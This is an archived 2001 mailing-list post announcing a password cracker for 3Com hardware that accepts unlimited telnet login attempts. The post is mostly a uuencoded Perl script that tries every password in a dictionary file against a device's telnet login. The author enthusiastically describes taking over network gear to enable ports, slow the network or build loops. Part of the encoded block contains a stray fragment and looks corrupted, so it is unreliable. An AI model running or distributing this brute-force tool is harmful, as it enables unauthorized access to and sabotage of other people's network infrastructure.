3Com TelnetD

From: Siberian (siberian@sentry-labs.com)
Date: Thu Jul 12 2001 - 13:46:44 PDT

  • Next message: Andreas Marx: "Re: SECURITY.NNOV: directory traversal and path globing in multiple archivers" 

    I noticed that there are infinity retries and no delay enabled at 3Com
hardware, so I wrote this little Telnetcracker for this problem. I send it
to 3Com, but I think they weren't bothered much about that. They sended me a
notice to provide hardware serial and my name etc. ....strange... =)
This should work for must 3Com hardware with Telnet config enabled. I tested
it with a PS40 SuperStack II and it worked fine. Tips and suggestions
welcome.

It's really fun to crack into network hardware, imagine of all the nice
features most devices support...enabling port, slowing down network,
building loops...

By the way, this one needs a dictionary file.

regards

Siberian
CSC Sentry Research Labs
(www.sentry-labs.com)






begin 666 3comCrack.pl
M(R$O=7-R+V)I;B]P97)L("UW#0H-"B,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C#0HC(" @(" @(" @
M(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @
M(PT*(R S0V]M(%1E;&YE="!#<F%C:V5R('8P+C%B(" @(" @(" @(" @(" @
M(" @(" @(" @(" @(",-"B,@+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2 @
M(" @(" @(" @(" @(" @(" @(" @(" @(" C( T*(R @(" @(" @(" @(" @
M(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(",-"B,@
M5&5L;F5T(&EM<&QE;65N=&%T:6]N(&%R8V]R9&EN9R!T;R!21D,@.#4T(" @
M(" @(" @(" C#0HC(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @
M(" @(" @(" @(" @(" @(" @(" @(PT*(R!W<FET=&5N(#(P,#$@8GD@4VEB
M97)I86X@6W=W=RYS96YT<GDM;&%B<RYC;VU=(" @(" @(",-"B,@(" @(" @
M(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @
M(" C#0HC(%1E<W1E9"!W:71H.B @(" @(" @(" @(" @(" @(" @(" @(" @
M(" @(" @(" @(" @(" @(R -"B,@06-T:79E(%!E<FP@*%=I;F1O=W,@3E0I
M(" @(" @(" @(" @(" @(" @(" @(" @(" @(" C( T*(R!097)L(#4N<W1A
M8FQE("A3;&%C:W=A<F4@,RXV("8@-RXQ*2 @(" @(" @(" @(" @(" @(",@
M#0HC(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @
M(" @(" @(" @(" @(R -"B,@(" @5&AI<R!3;V9T=V%R92!I<R!P=6)L:7-H
M960@=6YD97(@1U!,('8R(" @(" @(" @(" C( T*(R @(" @(" @(" @(" @
M(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(",-"B,@
M(" @(" @("!&3U(@14150T%424].04P@4%524$]54T4@3TY,62$@(" @(" @
M(" @(" @(" C#0HC(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @(" @
M(" @(" @(" @(" @(" @(" @(" @(PT*(R!34DP@8V%N)W0@8F4@:&5L9"!R
M97-P;VYS:6)L92!F;W(@86YY(&1A;6=A92!C875S960@(",-"B,@8GD@=&AE
M('-O9G1W87)E+"!D:7)E8W0@;W(@:6YD97)E8W1L>2!T;R!A;GET:&EN9R @
M(" C#0HC(&]R(&%N>6]N92X@(" @(" @(" @(" @(" @(" @(" @(" @(" @
M(" @(" @(" @(" @(" @(R -"B,@(" @(" @(" @(" @(" @(" @(" @(" @
M(" @(" @(" @(" @(" @(" @(" @(" @(" @(" C#0HC(R,C(R,C(R,C(R,C
M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(PT*
M(" @(" -"@T*=7-E(%-O8VME=#L-"@T*<W5B(&=U97-S<&%S<R![#0H-"B1I
M/3$[#0HD=7-E<F@@/2 D=7-E<F8[#0HD=7-E<F8@/2!J;VEN("<G+" D=7-E
M<F8L(&-H<B@Q,RDL(&-H<B@Q,"D[#0H-"G)E8W8H4T]#2RPD;VPL,2PP*3L-
M"G=H:6QE*"@D;VP@;F4@(DPB*2 F)B H)&]L(&YE(")0(BD@)B8@*"1O;"!N
M92 B32(I*7L-"B @("!R96-V*%-/0TLL)&]L+#$L,"D[#0I]#0H-"G=H:6QE
M*&1E9FEN960H)'!A<W-W9" ](#Q&24Q%,3XI*2![#0H@("!C:&]P*"1P87-S
M=V0I.PT*(" @<')I;G0@(BXB.PT*=VAI;&4H)&D@(3T@,RD@>PT*(" @:68H
M)&]L(&5Q("),(BE[( T*(" @('-E;F0H4T]#2RPD=7-E<F8L,"D[( T*(" @
M?0T*(" @:68H)&]L(&5Q(")0(BD@>R -"B @(" D<&%S<W=D(#T@:F]I;B G
M)RP@)'!A<W-W9"P@8VAR*#$S*2P@8VAR*#$P*3L-"B @("!S96YD*%-/0TLL
M)'!A<W-W9"PP*3L@#0H@("!]#0H@("!R96-V*%-/0TLL)&]L+#$L,"D[#0H@
M("!W:&EL92@H)&]L(&YE("),(BD@)B8@*"1O;"!N92 B4"(I("8F("@D;VP@
M;F4@(DTB*2E[#0H@(" @<F5C=BA33T-++"1O;"PQ+# I.PT*(" @?0T*(" @
M:68H)&]L(&5Q(")-(BD@>PT*(" @("!P<FEN=" B7&Y<;E!A<W-W;W)D(&9O
M<B D=7-E<F@@:7,@)'!A<W-W9%QN(CL-"B @(" @97AI=" P.PT*(" @?0T*
M)&DK*PT*?0T*)&D],3L-"GT-"G!R:6YT(")<;EQN270G<R!S860@8G5T('1R
M=64L('EO=2!F86EL960N7&XB.PT*?0T*#0H-"G!R:6YT(")<;C-#;VT@2&%R
M9'=A<F4@5&5L;F5T($QO9VEN($-R86-K97(L('=R:71T96X@8GD@4VEB97)I
M86X@7"T@4V5N=')Y(%)E<V5A<F-H($QA8G-<;EQN(CL-"G!R:6YT(")'970@
M=&AE(&QA=&5S="!697)S:6]N(&%T('=W=RYS96YT<GDM;&%B<RYC;VU<;EQN
M(CL-"B1R96UO=&4@/2!S:&EF="!\?"!D:64@(G5S86=E.B N+V-R86-K,V-O
M;2YP;"!;=&%R9V5T(&AO<W1=(%MD:6-T:6]N87)Y72 H=7-E<FYA;64I(CL-
M"B1P87-S9B ]('-H:69T('Q\(&1I92 B=7-A9V4Z("XO8W)A8VLS8V]M+G!L
M(%MT87)G970@:&]S=%T@6V1I8W1I;VYA<GE=("AU<V5R;F%M92DB.PT*)'5S
M97)F(#T@<VAI9G0@?'P@*"1U<V5R9B ](")A9&UI;B(I.PT*#0HD:6%D9'(@
M/2!I;F5T7V%T;VXH)')E;6]T92D@;W(@9&EE(").;R!T87)G970@:&]S="!C
M;VUP=71E<B!F;W5N9"$B.PT*)'!A9&1R(#T@<V]C:V%D9')?:6XH,C,L("1I
M861D<BD[#0HD<')O=" ](&=E='!R;W1O8GEN86UE*"=T8W G*3L-"G-O8VME
M="A33T-++"!!1E])3D54+"!33T-+7U-44D5!32P@)'!R;W0I(&]R(&1I92 B
M<V]C:V5T.B D(2([#0IC;VYN96-T*%-/0TLL("1P861D<BD@?'P@9&EE(")#
M86XG="!C;VYN96-T('1O('1A<F=E="!H;W-T(2([( T*#0IO<&5N*$9)3$4Q
M+" B)'!A<W-F(BD@?'P@9&EE(")#86XG="!O<&5N(%!A<W-W;W)D(&QI<W0A
M(CL-"G)E8W8H4T]#2RPD;VPL,2PP*3L-"B1B<R ](&IO:6X@)R<L(&-H<B@Q
M,"DL8VAR*#$S*2QC:'(H,3 I.PT*<V5N9"A33T-++" D8G,L(# I.R -"F=U
M97-S<&%S<Rat_private*#0IC;&]S92A&24Q%,2D[#0IC;&]S92A33T-+*3L-"F5X
':70@,#L-"@``
`
end

    This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 20:21:58 PDT